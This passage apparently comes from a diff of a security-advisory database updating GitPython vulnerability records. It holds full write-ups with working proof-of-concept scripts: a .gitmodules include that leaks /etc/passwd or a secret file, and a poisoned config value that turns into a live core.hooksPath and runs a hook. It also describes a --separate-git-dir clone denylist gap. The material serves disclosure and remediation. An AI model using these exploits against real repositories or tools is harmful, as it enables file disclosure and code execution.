(`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78676.json b/advisories/BREW-legit-CVE-2026-78676.json index 20a73420fe7..32ae9e50e22 100644 --- a/advisories/BREW-legit-CVE-2026-78676.json +++ b/advisories/BREW-legit-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78676", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78677.json b/advisories/BREW-legit-CVE-2026-78677.json index d70863b9a99..b8ab38a942a 100644 --- a/advisories/BREW-legit-CVE-2026-78677.json +++ b/advisories/BREW-legit-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78677", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option 